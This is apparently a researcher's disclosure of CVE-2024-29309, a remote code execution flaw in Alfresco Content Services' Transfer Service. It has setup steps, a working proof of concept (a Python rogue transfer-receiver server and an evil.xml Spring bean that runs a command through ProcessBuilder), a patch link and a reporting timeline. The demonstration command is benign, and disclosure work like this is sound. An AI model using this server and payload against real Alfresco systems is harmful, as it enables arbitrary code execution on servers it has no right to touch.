Alfresco Content Services
Affecting versions prior to 23.3.0.23
The issue has been fixed in version 23.3.0.23
CVE-2024-29309
Remote Coed Execution
Alfresco Content Services has a remote code execution (RCE) vulnerability in the Transfer Service
The vulnerability stems from a feature in the Transfer Service, which allows the configuration of the properties Endpoint Host and Endpoint Port for transfer folders. An attacker can exploit this by setting up a malicious Transfer Receiver, then configuring the Endpoint Host and Endpoint Port of the transfer folders to this malicious service.
The Transfer Service allows the configuration of the properties Endpoint Host and Endpoint Port for transfer folders. An attacker can exploit this by setting up a malicious Transfer Receiver, then configuring the Endpoint Host and Endpoint Port of the transfer folders to this malicious service. This could lead to arbitrary code execution on Alfresco Content Services (ACS). Here are the detailed steps:
Refer to the official documentation
In the source repository, create a new folder in Company Home > Data Dictionary > Transfers > Transfer Target Groups > Default Group.
In the New Folder window specify a name, for example, Replica. You can add a title, and description of the new folder, if you wish.
A rule defined on the Default Group folder specializes the type of any folder created in it.
The type is set automatically by the folder rule to
trx:transferTarget
. This allows you add the required properties to define the replication target through the user interface.Click Edit Properties on your new folder (Replica).
Specify the required properties:
- Specify the Endpoint Host, Endpoint Port, Username and Password.
- Click Enabled and Save.
Enable the replication service in your
alfresco-global.properties
file:replication.enabled=true
and restart the source repository.
Here, the Endpoint Host and Endpoint Port are set to the address of the malicious server. Next, the attacker sets up two files to act as the malicious server.
from http.server import BaseHTTPRequestHandler, HTTPServer
class MyServer(BaseHTTPRequestHandler):
def handle_request(self):
if self.path == '/evil.xml':
self.send_response(200)
self.send_header('Content-type', 'text/xml')
self.end_headers()
with open('evil.xml', 'r') as file:
self.wfile.write(bytes(file.read(), 'utf-8'))
else:
self.send_response(500)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(bytes('{"errorType":"org.springframework.context.support.ClassPathXmlApplicationContext","errorMessage":"http://Endpoint Host:Endpoint Port/evil.xml"}', "utf-8"))
def do_GET(self):
self.handle_request()
def do_POST(self):
self.handle_request()
def run(server_class=HTTPServer, handler_class=MyServer, port=7575):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
print(f'Starting httpd on port {port}...')
httpd.serve_forever()
if __name__ == "__main__":
run()
evil.xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg >
<list>
<value>touch</value>
<value>/tmp/siebene</value>
</list>
</constructor-arg>
</bean>
</beans>
touch /tmp/siebene
was executed here.
https://github.com/Alfresco/alfresco-community-repo/commit/c31158a11303a0da88e3ba22be387f6ef21493ae
March 7th: Sent the report to security@alfresco.com
April 3rd: Patch submitted to the GitHub repository
April 11th: Received a response, claiming that the report has been received